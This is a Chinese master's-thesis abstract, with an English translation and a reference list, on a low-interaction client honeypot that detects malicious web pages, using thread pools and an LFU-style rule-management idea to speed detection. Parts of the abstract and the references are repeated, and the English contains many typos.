基于恶意网页检测的蜜罐系统研究
摘要
蜜罐是一种用来发现攻击工具、攻击策略与攻击者攻击动机的知名技术。它是近年来兴起的一项全新的、从战争欺骗思想发展而来的网络安全技术,其目的在于被探测、攻击和摧毁。它们直接或间接地有助于保护产品系统和网络免受攻击。蜜罐技术在追踪钓鱼网络、僵尸网络等方面发挥了很大的作用。随着防火墙、反病毒引擎等一系列基础性安全技术不断成熟,使得攻击者们在传统的攻击渠道上收效甚少,于是黑客们转向了客户端攻击,通过这种更简单且无安全保护措施的攻击途径将其恶意软件安装到终端用户机上,以此收集用户的敏感信息。针对客户端攻击,一种新型的蜜罐一客户端蜜罐被提了出来。客户端蜜罐在网络中与众多服务器交互,根据其服务的恶意行为的特性将它们分类。
本文沿着客户端蜜罐的方向,研究了基于恶意网页检测的低交互客户端蜜罐。通过对低交互客户端蜜罐系统设计思想和实现机制的具体分析,总结出了低交互客户端蜜罐系统各模块详细的结构与运作流程,对系统进行了实现。同时为了能更好的检测到隐藏的恶意页面代码,针对目前恶意网页使用实施技术,在系统实现过程中进行了相应的改进。
针对低交互客户端蜜罐在恶意网页的检测速度上不够理想的缺陷,本文提出了利用线程池的技术提高系统的检测速度。实验表明,线程池技术的使用,明显的提高了系统的检测速度。同时,本文利用操作系统中最不经常使用页面置换算法的思想,提出了一种理论算法来解决实验中得出的通过增加签名匹配规则提高检测的精确度,会导致系统检测速度变慢的问题。
Honeypot is a well known technique for discovering the tools, tactics, and motives of attackers. It is a completely new network security technology that is emerging in recent years based on the ideas of cheating in the war. It is intended to be probed, attacked, and compromised. Directly or indirectly, it helps protect your production systems and networks against attackers. The honeypot technology has played the very major role in analysising Phishing attacks and tracking BotNets. Since attackers have a tendency to take the path of least resistance and many traditional attack paths are barred by a basic set of unceasingly maturely security measures, such as firewalls or anti-virus engines, the (?)tlack hats(?) re turning to client-side attacks. Through these easily unprotected attack paths, they place their malware onto the end user(?)machine and collecting sensitive data by the malware. A new type of client honeypot has been proposed. It can detect the client-side attacks. Client honeypots crawl the network, interact with servers, and classify servers with respect to their malicious nature.
This paper studies the low interaction client honeypot which is based on the malicious web detection by employing client honeypot. By analysing the systematic design theories and implementation mechanism of the low interaction client honeypot, we summerise the honeypot's detailed structures of each module and the operation process. Additionally, in order to detect the codes of hidden mallicious web, it makes improvement during the implementation of the system in accodance with the technologies the malicious web involve.
To eliminate the speed flaws of the honeypot's detecting mallicious web, the paper recommends the thread pool technique to accerlerate the speed. Experiments have proved that the usage of the thread pool technique has significantly accerlerate the system's detection speed. This paper also comes out with the theoretical algorithms by using the least frequently use page replacement algorithms in the operating system to slove a problem which obtains from the experiments. This problem is that improving the accuracy of detection by increasing the signature-based matching rules will lead to the slow down of the detection speed.
本文沿着客户端蜜罐的方向,研究了基于恶意网页检测的低交互客户端蜜罐。通过对低交互客户端蜜罐系统设计思想和实现机制的具体分析,总结出了低交互客户端蜜罐系统各模块详细的结构与运作流程,对系统进行了实现。同时为了能更好的检测到隐藏的恶意页面代码,针对目前恶意网页使用实施技术,在系统实现过程中进行了相应的改进。
针对低交互客户端蜜罐在恶意网页的检测速度上不够理想的缺陷,本文提出了利用线程池的技术提高系统的检测速度。实验表明,线程池技术的使用,明显的提高了系统的检测速度。同时,本文利用操作系统中最不经常使用页面置换算法的思想,提出了一种理论算法来解决实验中得出的通过增加签名匹配规则提高检测的精确度,会导致系统检测速度变慢的问题。
Honeypot is a well known technique for discovering the tools, tactics, and motives of attackers. It is a completely new network security technology that is emerging in recent years based on the ideas of cheating in the war. It is intended to be probed, attacked, and compromised. Directly or indirectly, it helps protect your production systems and networks against attackers. The honeypot technology has played the very major role in analysising Phishing attacks and tracking BotNets. Since attackers have a tendency to take the path of least resistance and many traditional attack paths are barred by a basic set of unceasingly maturely security measures, such as firewalls or anti-virus engines, the (?)tlack hats(?) re turning to client-side attacks. Through these easily unprotected attack paths, they place their malware onto the end user(?)machine and collecting sensitive data by the malware. A new type of client honeypot has been proposed. It can detect the client-side attacks. Client honeypots crawl the network, interact with servers, and classify servers with respect to their malicious nature.
This paper studies the low interaction client honeypot which is based on the malicious web detection by employing client honeypot. By analysing the systematic design theories and implementation mechanism of the low interaction client honeypot, we summerise the honeypot's detailed structures of each module and the operation process. Additionally, in order to detect the codes of hidden mallicious web, it makes improvement during the implementation of the system in accodance with the technologies the malicious web involve.
To eliminate the speed flaws of the honeypot's detecting mallicious web, the paper recommends the thread pool technique to accerlerate the speed. Experiments have proved that the usage of the thread pool technique has significantly accerlerate the system's detection speed. This paper also comes out with the theoretical algorithms by using the least frequently use page replacement algorithms in the operating system to slove a problem which obtains from the experiments. This problem is that improving the accuracy of detection by increasing the signature-based matching rules will lead to the slow down of the detection speed.
引文
[1] Thorsten Holz and Georg Wicherski , Effektives Sammeln von Malware mit Honeypots, Proceedings of 13th DFN-CERT Workshop Hamburg, 2006.
[2] Thorsten Holz , Spying With the Help of Bots, login: by USENIX, volume 30, number 6,2005.
[3] Thorsten Holz ,A Short Visit to the Bot Zoo,IEEE Security and Privacy,2005.
[4] Felix C. Freiling, Thorsten Holz, Georg Wicherski, Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks, Technical Report, AIB 2005-07.
[5] Paul Bacher, Thorsten Holz,Markus Kotter, Georg Wicherski, Know your Enemy: Tracking Botnets Using honeynets to learn more about Bots, The Honeynet Project & Research Alliance, http://www. honeynet. org/papers/bots/, 2005. 03. 13.
[6] David Watson, Thorsten Holz, Sven Mueller, Know your Enemy:Phishing Behind the Scenes of Phishing Attacks, The Honeynet Project & Research Alliance, http://www. hone ynet. org/papers/phishing/, 2005. 5. 16.
[7] L. Spitzner, Honeypots: Catching the Insider Threat, Proceedings of the 19th Annual Computer Security Applications Conference,Las Vegas, Nevada, USA,2003.12.
[8] Christian Seif ert, Ramon Steenson, Thorsten Holz , Yuan Bing, Michael A. Davis, Know Your Enemy:Malicious Web Servers, The Honeynet Project & Research Alliance, http: //www. honeynet. org/papers/mws, 2007. 08. 09.
[9] HOLZ T, KOETTEH M., The German honeyclient project, http://www. chicagohoneyn et. org/german-honeypot-holz. pdf, 2007. 01.
[10] HoneyC-The Low Interaction Client Honeypot, http://honeyc. sourceforge. net/des cryyption. php;
[11] Lance Spitzner,Honeypot-Definitions and Value of Honeypots, http://www. trac king-hackers.com/papers/honeypots. html, 2003.
[12] Know Your Enemy: Honeynets, The Honeynet Project, http://www. honeynet. org/paper s/honeynet/index.html, 2006.05. 31.
[13] Lance Spitzner, Honeypots:Tracking Hackers, 1st Edition, Pearson Education, Inc. 2002:37-54.
[14] Know Your Enemy: Passive Fingerprinting, The Honeynet Project, http://www. honey net. org/papers/finger/, 2002. 03
[15] Hacking Linux Exposed:Linux Security Secrets & Solutions, Brian Hatch, James Lee, George Kurtz, The McGraw-Hill Companies, 2001:101-107.
[16]Fred Cohen&Associate,Deception Toolkit,http://all.net/dtk/index.html
[17]Honeyd and Arpd,http://www.citi.umich.edu/u/provos/honeyd
[18]Back Orifice,http://www.cultdeadcow.com/tools/bo.html
[19]Back Orifice Plugins,http://www.cultdeadcow.com/tools/bo_plugins.html
[20]SPECTER Intrusion Detection System,http://www.specter.com/default50.htm
[21]Lance Spitzner,Honeypots:Tracking Hackers,lst Edition,Pearson Education,Inc,2002:182-192.
[22]Know Your Enemy:GenII Honeynets,The Honeynet Project,http://www.honeyne t.org/papers/gen2/index.html.2005.03.12
[23]Honeywall CDROM,The Honeynet Project & Research Alliance,http://www.honeynet.org/tools/cdrom/,2005.0517
[24]Know Your Enemy:Sebek,The Honeynet Project,http://www.honeynet.org/papers/sebek.pdf
[26]Oskar Andreasson,Iptables Tutorial 1.2.2,http://iptables-tutorial.Frozentux.net/iptables-tutorial.html
[27]Snort,http://www.snort.org/
[28]Know Your Enemy:Defining Virtual Honeynets,The Honeynet Project,http://www.honeynet.org/papers/kye.html,2003.01.27
[29]Joel Scanbray,Mike Shema,Web Application Security Secrets & Solutions.,北京:清华大学出版社,2003:55-121.
[30]Scambray SMcClure,Windows 2000黑客大曝光,杨洪涛译.北京:清华大学出版社,2002.:60.217-277.
[31]William R Stanek,Windows 2000脚本编程,北京:中国水利水电出版社,2001.05:42-116.
[32]Cliff C Zou,Adaptive Defense Against Various Network Attacks,http://tennis.ecs.umass.edu/~czou/research/research/adaptiveDefense.pdf,2005.
[33]Wang K,Honeyclient,Version 0.1.1,http://www.honeyclient.org/
[34]Yuan,B.and Holz,T,Client-Side Honeypots,http://pil.informatik,uni-mann heim.de/diplomas/show/27,2006.
[35]Wang,Y.M.,Beck,D.,Jang,X.,Roussev,R.,Verbowski,C.,Chen,S.and King,S.,Automated Web Patrol with Strider HoneyMonkeys:Finding Web Sites That Exploit Browser Vulnerabilities,In 13th Annual Network and Distributed System Security Symposium(San Diego,2006),Internet Society.
[36]Moshchuk,A.,Bragin,T.,Gribble,S.D.,and Levy,H.M.A Crawler-based Study of Spyware on the Web.In 13th Annual Network and Distributed System Security Symposium(San Diego,2006),The Internet Society.
[37]Mara,F.,Tang,Y.,Steenson,R.and Seifert,C.,Capture-Honeypot Client,http://capture-hpc.sourceforge.net/,2006.
[38]About HoneyC,https://projects.honeynet.org/honeyc/wiki/AboutlloneyC
[39]Roesch,M.,Snort-Lightweight Intrusion Detection for Networks,In 13th Large Systems Administration Conference(Seattle,1999),Usenix,pp.:229-238.
[40]Gulli,A.and Signorini,A.,The Indexable Web is more than 11.5 billion pages,http://www.cs.uiowa.edu/~asignori/web-size/,2005.
[41]Systems,S.o.I.M..How Much Information? http://www2.sims.berkeley.edu/research/projects/how-much-info-2003/,2003.
[42]Netcraft,October 2006 Web Server Survey,http://news.netcraft.com/archives/2006/10/06/october_2006_web_server_survey.html,2006.
[43]CNNIC中国互联网络信息中心,2005年中国互联网络信息资源数量调查报告,http://www.cnnic.net.cn/download/2005/20050301,pdf,2006.03:45.
[44]Scott Oaks&Henry Wong,Java Threads,Third Edition,O' Reilly,September 2004:Chapter 10.Thread Pools.
[45]Lucas Carlson&Leonard Richardson,O'Reilly,July 2006:Chapter 20.Recipe 20.7
[46]Sourcefire VRT Certified Rules,www.snort.org/vrt
[47]Bleeding:sigs/EXPLOIT,http://www.bleedingsnort.com/cgi-bin/viewcvs.cgi/sigs /EXPLOIT/#dirli
[48]张尧学编著,计算机操作系统教程,清华大学出版社,2000年08月第2版:118-127.
[2] Thorsten Holz , Spying With the Help of Bots, login: by USENIX, volume 30, number 6,2005.
[3] Thorsten Holz ,A Short Visit to the Bot Zoo,IEEE Security and Privacy,2005.
[4] Felix C. Freiling, Thorsten Holz, Georg Wicherski, Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks, Technical Report, AIB 2005-07.
[5] Paul Bacher, Thorsten Holz,Markus Kotter, Georg Wicherski, Know your Enemy: Tracking Botnets Using honeynets to learn more about Bots, The Honeynet Project & Research Alliance, http://www. honeynet. org/papers/bots/, 2005. 03. 13.
[6] David Watson, Thorsten Holz, Sven Mueller, Know your Enemy:Phishing Behind the Scenes of Phishing Attacks, The Honeynet Project & Research Alliance, http://www. hone ynet. org/papers/phishing/, 2005. 5. 16.
[7] L. Spitzner, Honeypots: Catching the Insider Threat, Proceedings of the 19th Annual Computer Security Applications Conference,Las Vegas, Nevada, USA,2003.12.
[8] Christian Seif ert, Ramon Steenson, Thorsten Holz , Yuan Bing, Michael A. Davis, Know Your Enemy:Malicious Web Servers, The Honeynet Project & Research Alliance, http: //www. honeynet. org/papers/mws, 2007. 08. 09.
[9] HOLZ T, KOETTEH M., The German honeyclient project, http://www. chicagohoneyn et. org/german-honeypot-holz. pdf, 2007. 01.
[10] HoneyC-The Low Interaction Client Honeypot, http://honeyc. sourceforge. net/des cryyption. php;
[11] Lance Spitzner,Honeypot-Definitions and Value of Honeypots, http://www. trac king-hackers.com/papers/honeypots. html, 2003.
[12] Know Your Enemy: Honeynets, The Honeynet Project, http://www. honeynet. org/paper s/honeynet/index.html, 2006.05. 31.
[13] Lance Spitzner, Honeypots:Tracking Hackers, 1st Edition, Pearson Education, Inc. 2002:37-54.
[14] Know Your Enemy: Passive Fingerprinting, The Honeynet Project, http://www. honey net. org/papers/finger/, 2002. 03
[15] Hacking Linux Exposed:Linux Security Secrets & Solutions, Brian Hatch, James Lee, George Kurtz, The McGraw-Hill Companies, 2001:101-107.
[16]Fred Cohen&Associate,Deception Toolkit,http://all.net/dtk/index.html
[17]Honeyd and Arpd,http://www.citi.umich.edu/u/provos/honeyd
[18]Back Orifice,http://www.cultdeadcow.com/tools/bo.html
[19]Back Orifice Plugins,http://www.cultdeadcow.com/tools/bo_plugins.html
[20]SPECTER Intrusion Detection System,http://www.specter.com/default50.htm
[21]Lance Spitzner,Honeypots:Tracking Hackers,lst Edition,Pearson Education,Inc,2002:182-192.
[22]Know Your Enemy:GenII Honeynets,The Honeynet Project,http://www.honeyne t.org/papers/gen2/index.html.2005.03.12
[23]Honeywall CDROM,The Honeynet Project & Research Alliance,http://www.honeynet.org/tools/cdrom/,2005.0517
[24]Know Your Enemy:Sebek,The Honeynet Project,http://www.honeynet.org/papers/sebek.pdf
[26]Oskar Andreasson,Iptables Tutorial 1.2.2,http://iptables-tutorial.Frozentux.net/iptables-tutorial.html
[27]Snort,http://www.snort.org/
[28]Know Your Enemy:Defining Virtual Honeynets,The Honeynet Project,http://www.honeynet.org/papers/kye.html,2003.01.27
[29]Joel Scanbray,Mike Shema,Web Application Security Secrets & Solutions.,北京:清华大学出版社,2003:55-121.
[30]Scambray SMcClure,Windows 2000黑客大曝光,杨洪涛译.北京:清华大学出版社,2002.:60.217-277.
[31]William R Stanek,Windows 2000脚本编程,北京:中国水利水电出版社,2001.05:42-116.
[32]Cliff C Zou,Adaptive Defense Against Various Network Attacks,http://tennis.ecs.umass.edu/~czou/research/research/adaptiveDefense.pdf,2005.
[33]Wang K,Honeyclient,Version 0.1.1,http://www.honeyclient.org/
[34]Yuan,B.and Holz,T,Client-Side Honeypots,http://pil.informatik,uni-mann heim.de/diplomas/show/27,2006.
[35]Wang,Y.M.,Beck,D.,Jang,X.,Roussev,R.,Verbowski,C.,Chen,S.and King,S.,Automated Web Patrol with Strider HoneyMonkeys:Finding Web Sites That Exploit Browser Vulnerabilities,In 13th Annual Network and Distributed System Security Symposium(San Diego,2006),Internet Society.
[36]Moshchuk,A.,Bragin,T.,Gribble,S.D.,and Levy,H.M.A Crawler-based Study of Spyware on the Web.In 13th Annual Network and Distributed System Security Symposium(San Diego,2006),The Internet Society.
[37]Mara,F.,Tang,Y.,Steenson,R.and Seifert,C.,Capture-Honeypot Client,http://capture-hpc.sourceforge.net/,2006.
[38]About HoneyC,https://projects.honeynet.org/honeyc/wiki/AboutlloneyC
[39]Roesch,M.,Snort-Lightweight Intrusion Detection for Networks,In 13th Large Systems Administration Conference(Seattle,1999),Usenix,pp.:229-238.
[40]Gulli,A.and Signorini,A.,The Indexable Web is more than 11.5 billion pages,http://www.cs.uiowa.edu/~asignori/web-size/,2005.
[41]Systems,S.o.I.M..How Much Information? http://www2.sims.berkeley.edu/research/projects/how-much-info-2003/,2003.
[42]Netcraft,October 2006 Web Server Survey,http://news.netcraft.com/archives/2006/10/06/october_2006_web_server_survey.html,2006.
[43]CNNIC中国互联网络信息中心,2005年中国互联网络信息资源数量调查报告,http://www.cnnic.net.cn/download/2005/20050301,pdf,2006.03:45.
[44]Scott Oaks&Henry Wong,Java Threads,Third Edition,O' Reilly,September 2004:Chapter 10.Thread Pools.
[45]Lucas Carlson&Leonard Richardson,O'Reilly,July 2006:Chapter 20.Recipe 20.7
[46]Sourcefire VRT Certified Rules,www.snort.org/vrt
[47]Bleeding:sigs/EXPLOIT,http://www.bleedingsnort.com/cgi-bin/viewcvs.cgi/sigs /EXPLOIT/#dirli
[48]张尧学编著,计算机操作系统教程,清华大学出版社,2000年08月第2版:118-127.
© 2004-2018 中国地质图书馆版权所有 京ICP备05064691号 京公网安备11010802017129号 地址:北京市海淀区学院路29号 邮编:100083 电话:办公室:(+86 10)66554848;文献借阅、咨询服务、科技查新:66554700 |